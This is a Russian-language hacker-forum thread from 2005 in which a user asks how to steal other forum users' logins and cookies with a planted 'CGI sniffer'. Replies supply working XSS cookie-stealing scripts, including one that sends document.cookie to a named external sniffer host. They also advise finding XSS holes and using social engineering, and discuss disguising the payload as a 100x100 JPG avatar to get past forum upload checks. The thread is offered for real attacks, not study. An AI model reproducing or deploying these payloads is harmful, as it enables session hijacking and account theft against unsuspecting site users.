Как использовать cgi-снифферы?

Discussion in 'Песочница' started by ZetRoX, 5 Dec 2005.

  1. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    Привет всем, кто здесь присутствует.

    Прошу совет, что делать дельше...
    Я поставил сниффер с http://www.s.netsec.ru/ на один форум....кто-то нажал на мою фотку и у меня повились строки с IP адресом, ссылкой из какого топа пришли и время....а что надо дальше сделать, чтобы узнать логин и пароль этого счастливчика???
    или cookie....

    жду ответа, заранее благодарен.
    ____________________________
     
  2. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    А для этого нужен какой-нибудь скрипт, который ворует куки или тег )))
     
  3. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    285
    Likes Received:
    8
    Reputations:
    -1
    например если сниффер JPG, то <script>var img=new IMG(); img.src="sniffer/s.jpg"+document.cookie;</script> Или ченит типа этого ))
     
  4. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    найди xss уязвимость если пассивная то можно с помощью СИ(фреймы,или прямую ссылку это зависит от твоего воображения и опыта в СИ) если активная,то там на порядок проще.
    Код который нужно вставлять тебе уже привели,другие примеры скрипта ворующего куки можно поглядеть на antichat.ru
     
    1 person likes this.
  5. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Давайте из темы не будем делать флейм,все что не по теме (а у нас она про cgi снифферы) щас сотру.
     
  6. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    Прошу прощения, напишите мне плиз скрипт, чтобы его можно было во Flash вставить...
    ну короче говоря...есть Flash сайт....мне надо сделать так, чтобы при кликанье ссылки на мой сниф приходили куки...вот и всё....в ссылку могу вписать Java Script, FS Command, Action Script ну или ссылку на страницу....прошу напишите для чего-нить из этого скрипт....

    мой снифф http://s.netsec.ru/ZetRoX/pic.gif
     
  7. CTTAPTAK

    CTTAPTAK Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    40
    Likes Received:
    2
    Reputations:
    3
    обычно юзается скрипт <script>img=new Image(); img.src="http://s.netsec.ru/ZetRoX/pic.gif?;"+document.cookie;</script>

    у меня встречный вопрос:
    Как указать в скрипте размер картинки? (чтоб форум не противился принятию как аватар) требуется размер 100*100
     
  8. ZetRoX

    ZetRoX Elder - Старейшина

    Joined:
    4 Dec 2005
    Messages:
    52
    Likes Received:
    2
    Reputations:
    0
    я знаю, что этот скрипт, но он нефига не работает даже на самом себе проверял....
     
  9. CTTAPTAK

    CTTAPTAK Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    40
    Likes Received:
    2
    Reputations:
    3
    он работает но чтоб он работал на всяких форумах/порталах надо каким то образом сделать чтоб аплоадеры распоновали как ЖэПэГэшку с размерами 100*100